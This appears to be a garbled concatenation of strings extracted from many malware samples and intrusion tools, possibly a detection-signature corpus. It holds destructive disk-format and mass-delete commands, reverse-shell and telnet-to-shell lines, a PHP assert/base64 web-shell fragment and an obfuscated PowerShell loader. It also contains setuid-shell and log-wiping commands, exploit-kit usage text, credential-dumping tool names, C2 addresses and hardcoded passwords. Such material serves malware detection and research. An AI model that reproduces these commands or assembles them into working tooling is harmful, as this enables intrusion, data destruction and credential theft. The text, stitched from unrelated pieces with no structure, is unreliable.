jsmSetDisplayStyle('popupmenu' function jsmHideLastMenu() MenuData.length; iScripting.FileSystemObjectobjdata 0105000002000000E0C9EA79F9BACE118C8200AA004BA90B68007400740070003a002f002f00<?xml version=<?mso-application progid=\"Word.Document\"?>w:macrosPresent=\"yes\"<w:binData w:name=<o:Characters>0</o:Characters><o:Lines>1</o:Lines>n
GetClusterResourceTypeKeyQueryInformationJobObjecti
FreeConsoleProcess WriteParameterFilesSTOCKMASTERInsertEmailFax
VirtualAlloc
RtlMoveMemory
CallWindowProcA
POLA= Array(77, 90,33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46,\\objdata4f4c45324c696e6bd0cf11e0a1b11ae1680074007400700073003a002f002f006600740070003a002f002f00%%EOFIndex[5 1 7 1 9 4 23 4 50<pdf xmlns=<chunk></pdf>JVBERi0<</S/Launch/Type/Action/Win<</F<</EmbeddedFiles
GetSystemDirectoryGetWindowsDirectoryIsBadReadPtrIsBadWritePtrUrlDownloadToFile{\\field{\\*\\fldinst { INCLUDEPICTURE.php?id=\\\\* MERGEFORMAT \\\\d}}{\\fldrslt}}UserFormUserLoginFormInvalid username or passwordpostUpload_
VBAProjectAttribut
e VB_vbaData.xmlAutoOpenM
PNG{\rtf1
GIF8This program cannot be run in DOS modeThis program must be run under Win32UserForm1TextBox1Microsoft Forms 2.0ret.logMicrosoft Internet Explorer 6.0szURL FailszURL Successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[Insert][Delete][End]!(*@)(!@KEY!(*@)(!@SID=Services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend      binary outputXriteProcessMemoryIE:Password-Protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdgIDR_DATA%dasdfqwe123cxzMode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s IP port [proxip] [port] [key]DownRun success%s@gmail.com<!--%s-->W4qKihsb+So=PoqKigY7ggH+VcnqnTcmhFCo9w==8oqKiqb5880/uJLzAsY=Mozilla4.0 (compatible; MSIE 7.0; Win32)Mozilla5.1 (compatible; MSIE 8.0; Win32)GetfilePutfile---[ Virtual Shell]---Not Comming From Our Server %s.Mozilla/4.0 (compatible; MSIE 7.0;)KilFailKilSuccpkkillpklistKill process success!Kill process failed!Sleep success!based on glooxglooxtest.pdb
:Send to Server failed.HandShake with the server failed. Error:Decryption Failed. Context Expired.Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)!(*@)(!@PORT!(*@)(!@URLMyTmpFile.DatSvcHost.DLL.logMozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)%s\\%c%c%c%c%c%c%cwait:Dcryption Error! Invalid CharactersvcMsn.dllConfig service %s ok.Install an Service hosted by SVCHOST.The Dll file that to be released.Man,it's meOh,shitHallelujahnRet == SOCKET_ERRORrouji\\release\\Install.pdbrouji\\SvcMain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)name=%s&userid=%04d&other=%c%snoclientUser-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMMupfileokupfileerfxftest*(SY)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== Bye Bye ! ==========*letusgohtppmmv2.0.0.1Mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart Cmd Failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=W!r@o#n$gKerNel32.dllEclipse_A\\PJTS\\Eclipse_Client_B.pdbXiaoMESunCloud-Code/uc_server/data/forum.aspServerfile is smaller than Clientfile\\M tools\\MoonDLL
eB3gZFQOBtY3sifNOldocbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJMiniAsp.pdbSLYHKAAY!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpLjpltmivvdcbbfrfogjviirrximhttoskop!QAZ@WSX<meta xcd=%s?%.6uszFileUrl=%sstatus=%udown file successMozilla/4.0 (compatible; MSIE 6.0; Win32)%s\\Attachment.datMyOutlookmail.txtRecv Time:Subject:bits.exePDFBROWBrowser.exeProtect!pls give the FULL pathmapi32.dlldoCompressgetmail.dllname=\"GALX\"User-Agent: Shockwave Flashadd cookie failed...,speed=%fY29ubmVjdAc2xlZXAcXVpdAY21kdW5zdXBwb3J0IPHONE8.5(host:%s,ip:%s)SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNDefWatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!InprocServer32HKEY_PERFORMANCE_DATA<!---[<if IE 5>]id=iniet.exeSYSTEM\\CurrentControlSet\\Services\\DEVFSDevice File System2010QBPadobe_sl.exednsapi.dllReady!connect okWinHTTP 1.0reader_sl.exeMS80547.batADR32ControlService failed!3DC76854-C328-43D7-9E07-24BF894F8EF5HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunHello from MFC!/Default.aspx?INDEX=/Default.aspx?ID=Accept: text*/*xcmd.exeGoogle.exeBUILD ERROR!SUCCESS!wild scanCode too cleverinsufficient lookaheadMozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12VMProtecthttp://[c2_location]/[page].html<!---HEADER ADSPACE style=ERSVC.DLLntshrui.dll<!--DOCHTMLAusovexception...opened...ISUN32.EXE\\pipe\\ssnptoobu.iniServerfile is not bigger than ClientfileURL download success\\XiaoME\\SunCloud-Code\\moonURL download success!KugoosoftModify file failed!! 
So strange!Create cmd process failed!The command has not been implemented!Runas success!onec.php/bin/onecrusinfo.exeAdobeUpdater.exebuildout.exeIMSCMig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeAdobeUpdate.exeinetinfo.exesvehost.exeupdate.exeNTLMHash.exewpnpinst.exeWSDbg.exeadobeup.exe0830.bin1001.bina.binAcroRD32.EXEINETINFO.EXEWINRAR.SFXSteup=aspnet_client/report.aspname=%s&Gender=%c&Random=%04d&SessionKey=%snwwwks.dllrdisk.dllskeys.dllInstallServiceUninstallServiceDown file ok!Send file ok!Command Error!Pls choose target first!Alert!Pls press enter to make sure!Are you sure to Analysis And Outlook.docNorth Korean launch.pdfDollar General.docDow Corning Corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmRedLeavesSCMDSimulatorMutexred_autumnal_leaves_dllmain.dll\\NamePipe_MoreWindows
40W@=/
40$@=/
C:/Users/user/Desktop/my_OK_2014/bit9/runsna/Release/runsna.pdbd:/work/plug4.0(shellcode)/shellcode/shellcode/XSetting.hB
V)57gZ@*35W
RedLeavesCMDSimulatorMutexM
fxsst.dll.cSVGetLastActivePopupGetProcessHeapS:\\Lidstone\\renewing\\HA\\disable\\In.pdbR
GoogleCrashReport.dllCrashErrorsCrashSendCrashAddDataCrashCleanupCrashInit='base'.(str_replace(\"\\n\", ''.substr(md5(strrev(_COOKIEisset<?php $@assert(base64_decode($_REQUEST[(str_replace(\"\\n\", '', '(strrev($de'.'code';(StR_ReplAcE(\"\\n\",'',;if(PHP_VERSION<'5'){=SuBstr_rePlACe(
rundll32_exec.dll\x00Update
POST http://%ls:%d/%x HTTP/1.1%%TEMP%%\\%s_p.ax%TEMP%\\uid.ax%%TEMP%%\\%s.axsysinfo\x00sysbin01\\FlashUpdate.exerat_UnInstall!! Use Splice Socket !!User-Agent: SJZJ (compatible; MSIE 6.0; Win32)g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%du4(UeKnMiq/'p_9pJMfICMP.DLLEG}QAptsjWj:UO2nQpp2}W8weILqkC:lf1yzMkA
wj<1uH6fL-uDB9Iavo<rUS)sOFJH{_/f3e 03V<description> Windows system utility service  </description>W
WinHelpWReadProcessMemoryWshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falseWshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"Set WshShell = CreateObject(\"WScript.Shell\")Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlBadly formatted command= authorized_keys optionThis Dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassDs5Bu9Te7s
/c del /F /S /Q %c:\\*.*shutdown /r /t %d/
%08X.tmp/c format %c: /Y /X /FS:NTFS/c format %c: /Y /Qt
%c:\\~tmp%08X.tmp%s%08X.tmp.
KdDebuggerNotPresentKdDebuggerEnabled 
Setup=unsecess.exeSetup=leassnp.exe&
;The comment below contains SFX script commandsPath=%temp%w
userControl-v80.exeM
%TEMP%\\IELogs\\MSPUB.EXE%temp%\\\\NOTEPAD.EXE%4d-%02d-%02d %02d:%02d:%02d INTERNET_OPEN_TYPE_PRECONFIG%4d%02d%02d%02d%02d%02dMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)\\Mozilla\\Firefox\\Profiles\\\\auto.cfg/ncsi.txt/en-us/default.aspxcmd /cAPPDATA.
UserAgent: AUTH FAILEDINVALID FILE PATH.
FAILED TO WRITE FILE.
AuthType: .
Kill You%4.2f  KB
%Znms&vtogteq&ceppoz&di&typ&mp&JOS&qoji0
NTmcn7$
clbcaiq.dllprofapi_104/ShowWU
^IsWow64Processregsvr32 
function runmumaa()Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(function MoSaklgEs7(k)\\Microsoft\\wuauclt\\wuauclt.dat
evict1.pdbhttp://testing.corp 08
Session folder with name '%s' already exists.Show Unconnected Endpoints (Ctrl+U)C
Add &ResourceP
AssocQueryKeyAwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwSHInvokePrinterCommandAYcwxnkajPGPsdkDriverjpeg1x32SkypeIE6PluginCDllUninstall
cgi-bin/commcgi.cgilinkconf.netredirserver.netswupdt.com\
firefox.exe\
\\Users\\*\\Roaming\\Mozilla\\Firefox\\Profiles\\*\\Documents and Settings\\*%
%s; %s=%sCookie: %s=%sh
http://google.com/Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)O
<Command></Command>\" /d \"n
ID: 0x%xName: %Scmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST& SYSTEMINFO) ELSE EXITd
jpic.gov.sya
perfaudio.datCasper_DLL.dll{KY
W@{4216567A-4512-9825-7745F856}***** SYSTEM INFORMATION *********** SECURITY INFORMATION ******Antivirus: Firewall: ***** EXECUTION CONTEXT ******Identity: <CONFIG TIMESTAMP=mpgvwr32.dllUnexpected failure of wait! (%d)\"%s\" /e%d /p%serror in params!sscanf<>Param : 0x%xC
Local\\{c0d9770c-9841-430d-b6e3-575dac8a8ebf}Local\\{1ef9f94a-5664-48a6-b6e8-c3748db459b4}Interface\\%s\\infoInterface\\%s\\info\\%sCLSID\\%s\\info\\%sW
\\StringFileInfo\\%s\\FileVersionCLSID\\%s\\AuxCLSIDlnkfile\\shellex\\IconHandler%s: %s, %.2hu %s %hu %2.2hu:%2.2hu:%2.2hu GMT%sMutex\\ShellIconCache+6Service Pack ProcDataWrapimagehlp.dlldnlibsh%
acrotray.exeC
mcs.exeMcAltLib.dllW
varus_service_x86.dll/s %s /p %d /st %d /rt %dnet start %%1ping 127.1 > nulMcInitMISPAlertExsc start %%1net stop %%1WorkerRunDnsApi.dllsoftWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%sCONNECT %s:%d hTTP/1.1CONNECT %s:%d HTTp/1.1Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)iphlpapi.dll%systemroot%\\Web\\Proxy-Authorization: Negotiate %sCLSID\\{%s}\\InprocServer32B_WKNDNSK^rundll32 \"%s\",%s/c ping 127.%d & del \"%s\"RunMeByDLL32s
server.dllC
testsupdate33D
MSVCP60.DLL
mail-news.eicp.netcmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %srundll32.exe \"%s\", RunMeByDLL32E
%s -r debug 1\\\\.\\keymmdrv1wnyglwboazdcdwayflwCODETABL/c del %s >> NUL%s%s.manifestspideragent.exeAVGIDSAgent.exekavsvc.exemspaint.exekav.exeavp.exeNAV.exeGlobal\\RUNDLL32EXITEVENT_NAME{12845-8654-543}\
Global\\TERMINATEEVENT_NAME{12845-8654-542}ConsentPromptBehaviorAdminGlobal\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}d
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>GETPASSWORD1NvSmartMax.dllLICENSEDLGC
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHostregsvr32.exe /s \"%s\"Help and Support%SystemRoot%\\System32\\svchost.exe -k netsvcsSystem\\CurrentControlSet\\ServicesD
TsWorkSpaces.dll%
/selfservice/microsites/search.php?%016I64d/solutions/company-size/smb/index.htm?%016I64dM
{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}WUServiceMainC
CPports.txt,GET / HTTP/.}F
, Inc. 2002ICMP TimeUnable to open target process: %d, pid %dCouldn't delete target executable from remote machine: %dTarget: Failed to load SAM functions.Error writing the test file %s, skipping this shareFailed to create service (%s/%s), error %dService start failed: %d (%s/%s)PwDump.exeGetAvailableWriteableShare returned an error of %ld:\\\\.\\pipe\\%sCouldn't copy %s to destination %s. (Error %d)dump logon sessionTimed out waiting to get our pipe backSetNamedPipeHandleState failed, error %d%s\\%s.exe%s -<listen|tran|slave> <option> [-log logfile][-] Gethostbyname(%s) error:%se:\\VS 2008 Project\\htran\\Release\\htran.pdb[SERVER]connection to %s:%d error-tran  <ConnectPort> <TransmitHost> <TransmitPort>[-] ERROR: Must supply logfile name.[-] There is a error...Create a new connection.[+] Accept a Client on port %d from %s======================== htran V%s =======================[-] Socket Listen error.[-] ERROR: open logfile-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>[+] Make a Connection to %s:%d ......Recv %5d bytes from %s:%d[+] OK! I Closed The Two Socket.[+] Waiting another Client on port:%d....[+] Accept a Client on port %d from %s ......-listen <ConnectPort> <TransmitPort>%SystemRoot%\\System32\\svchost.exe -k sqlserver%s\\sqlsrv32.dll%s\\sqlsrv64.dll%s\\%d.tmpServiceMaix180.150.228.102Upload failed! [Remote error code:
DGGYDSYRL
GDGSYDLYR_%LxMainexecvecp -a %s %sdbus-daemon--noprofile--norcTERM=vt100/proc/%u/cmdlineloadso/proc/self/exeProxy-Connection: Keep-AliveHOST: %s:%dProxy-Authorization: Basic %sServer: ApacheProxy-Authenticategettimeofdaypthread_mutex_initpthread_mutex_destroypthread_mutex_lockgetsockoptsetsockoptopendirreaddirclosedirrename__this_moduleinit_moduleunhide_pidis_hidden_pidclear_hidden_pidlicensesrcversion=depends=vermagic=current_tasksock_releasemodule_layoutinit_uts_nsinit_netinit_taskfilp_open__netlink_kernel_createkfree_skb
\nuname -a\n\n/dev/shm/.x11.idLxMain64# \\u@\\h:\\w \\$ 0
/dev/pts/4/tmp/1408.logSHAREImagePathZwUnloadDriverZwLoadDriver/s /u_time64PCC_CMD_PACKETPCC_BASEMODPCC_SYSPCC_PROCESSPCC_FILEbcdedit -set testsigningupdate.microsoft.com_crt_debugger_hookue8G5\\Device\\-%s-%04dFAL2.03XXXXXXXXXXXXXXX
Dom4!nUserP4ss273ce6-b29f-90d618c0Ace123dxAce123dxl!Ace123dx!@#x/Catelog/login1.asp~DFTMP$$$$$.1GET /Query.asp?loginid=LoadConfigFromReg faildedLoadConfigFromBuildin success/photoe/photo.asp HTTPPOST /photos/photo.aspPCC_IDENT$$$--HelloWrod--$$$.?AVPCC_BASEMOD@@PS1=RK# \\u@\\h:\\w \\$unset LS_OPTIONS;uname -a[diskio]/tmp/.secure\x7fELF\
Update.dll\
Fuqing Dawu Technology Co.,Ltd.0XL Games Co.,Ltd.0Wemade Entertainment co.,Ltd0
User-Agent: %sHost: %s:%dCache-Control: no-cacheContent-Type: application/x-octet-streamPragma: no-cache3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff19490631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd:*:::D:\\:c:~:SPMUVRcopy /y \"%s\" \"%s\" del /f \"%s\" del /f /ah \"%s\" if exist \"%s\" goto Rept \\*.*.lnkDropped$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',.e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]f_RIdJ0W9RFb[$Fbc9[k_?WnhWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Ys
OpenSSL: FATAL{
MSI.dllStartActionm
NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer.?AV?$_Bind@$00XU?$_Pmf_wrap@P8CLR
@@AEXXZXV1@$$$V@std@@QAVCLR
@@@std@@\
romanian.antihackerP
ugly.gorilla1NdisIMCopySendCompletePerPacketInfoNdisReEnumerateProtocolBindingsNdisOpenProtocolConfigurationSetSecurityDescriptorSaclCompareStringAGetCommandLineWs
ca.dllS
ProcessUserAccountsS
RunDLLM
cmd.exe /c %s > %sexecute cmd timeout.rundll32.exe \"%s\",SettingDownloadFile - exception:%s.CDllApp::InitInstance() - Evnet create successful.UploadFile - EncryptBuffer ErrorW
DownloadFile - exception:%s,code:0x%08x.Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)CDllApp::InitInstance() - Evnet already exists../emptycriss <target IP>Cut and paste the following to the telnet prompt:environ define TTYPROMPT abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scriptedCannot read $opetc/scripme.override -- are you root?$ENV{EXPLOIT_SCRIPME}The encryption key is ___tempFile2.outUnless the -c (clobber) option is used, if two RETR commands of themywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")End of $destfile determined by \"^Connection closed by foreign host> /var/log/audit/audit.log; rm -f .Pastables to run on target:cp /var/log/audit/audit.log .tmpHere is the first good cron session fromNo need to clean LOGIN lines.sh >/dev/tcp/ <&1 2>&1TEST: mungedport=%6d  pp=%d  unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini X server on DEFAULT = 12121 ]\"CALLBACK_PORT=32177usage: %s -e -v -i target IP [-c Cert File] [-k Key File]TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=[-l Log File] [-m save MAC time file(s)] [-p Server Port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:EXE=$DIR/sbin/ey_vrupdateDel --- Usage: %s -l file -w wtmp -r userRoasting ->%s<- at ->%d:%d<-rbnoil -Roasting ->Requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~#  - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.DIR)cmd += \"D=-l%s \" % self.options.LISTEN_PORTUse this on target to get your RAT:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingSending final buffer: evil_blocks and shellcode...Timeout waiting for daemon to die.  
Exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>Writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c COMMAND: shell command stringCannot combine shell command mode with args to do socket reuse-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)Firing with the same hosts, on altername ports (target is on 8080, listener on 443)Recieved Unknown Command Payload: 0x%xUsage: eslide   [options] <-t profile> <-l listenerip> <targetip>-------- Delete Key - Remove a *closed* tabUsage: ./exp command display_to_return_tosizeof shellcode = %dExecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"Call back port2 = ${SPORT}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell           Use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.XXXXXXexecuting ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - Start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services# Building Shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80# STARTING EXHAUSTIVE ATTACK AGAINST Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr$gotsunos = ($line =~ /program version netid     address             service         owner/ );+ Bruteforce mode.+ Host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ Exploit failed, try -b to bruteforce.Usage: %s [-bBcCdfprsStv] [host]** SIGNIFICANTLY IMPROVE PROCESSING TIME-c cmd_name:     strncmp() search for 1st %d chars of commands that mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$TWindow 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard 
-c\\\"sleep 500|nc$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) -i target ip address / hostname Note: Choosing the correct target type is a bit of guesswork.Solaris rpc.cmsd remote root exploitIf one choice fails, you may want to try another.shellFilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: No such userexecv %s: %m%s/%s: unknown service?Usage: %s <shellcode> <output_file>Here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedUsage: %s [-V] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upWARNING - core wipe mode - this will leave a core file on target[-C] wipe target core file (leaves less incriminating core on failed target)-A <jumpAddr> (shellcode address)*** Insane undocumented incremental port mode!!! ***%x:%d  --> %x:%d %d bytesclient: can't bind to local address, are you root?Unable to register portCould not resolve destinationraw troubles$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) orUsage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.XXXXXX[-] couldn't create temp file/boot/System.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing.  Continue [y|n]? T=<target IP> [O=<port>] Y=<target type>no command given!! bailing...no port. 
assuming 22.../tmp/ratload.tmp.shRemote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`FATAL ERROR: -x port and -n port MUST NOT BE THE SAME.Example: ewok -t target publicUsage:  cleaner host community fake_prog-g  - Subset of -m that Green Spirit hits --- ewok versionUSAGE: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronUsage: $0 ( -s IP PORT | CMD )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")PHP_SCRIPT=\"$HOME/public_html/info$X.php\"cat > /dev/tcp/127.0.0.1/80 <<END*** Sorry about the raw output, I'll leave it for now-scan winn %s oneset uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- File Transfer ShellWelcome to the network scanning toolScanning port %d/current/down/cmdout/scansScan for SSH versionprogram vers proto   port  serviceUsage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetSending shellcode as part of an open command...cmdshellcodeYou will not be able to run the shellcode. Exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x IP      gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"Set-Cookie: bbsessionhash=\" . \\$hash . 
\"; path=/; HttpOnly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsUser($u) or die \"User '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp <<  16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uRemoteUploadCommand]processUploadglobal dothisreallyquiet[-] Failed to map file: %s[-] can not NULL terminate input data[!] Name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefABCEDF:A}%j,R
K4P%s: %s rpcprog=%d, rpcvers = %d/%d, proto=%s, wait.max=%d.%d, user.group=%s.%s builtin=%lx server=%s%s/%s: getsockname: %mABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}
print '  -s storebin  use storebin as the Store executable\\n'os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))print '  -k keyfile   the key text file to inject'127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warningiptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;noclient: failed to execute %s: %ssh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"Attempting connection from 0.0.0.0:<pVt,<et(<st$<ct$<ntj
chown root:root /tmp/.scsi/dev/bin/gshchmod 4777 /tmp/.scsi/dev/bin/gsh_lib_version,%02d%03dTRANSITstorestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)The NOPEN-args provided are injected into infile if it is a valid -i                do not autokill after 5 hours__strtoll_internal__strtoul_internalEFDGHIJKLMNOPQRSUTG8HcJ HcF LcF0LcNGhHcJ0HcF@LcF0LcN8Hgetexecnameinvalid option `__fpstartGHFIJKLMNOPQRSTUVXWHTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"exec /usr/share/redmin/cgi/redminop=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005
1if [ -f /tmp/tmpwatch ] ; thenecho \"bailing. try a different name\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s
readdir648
Missing argument for `-x'.
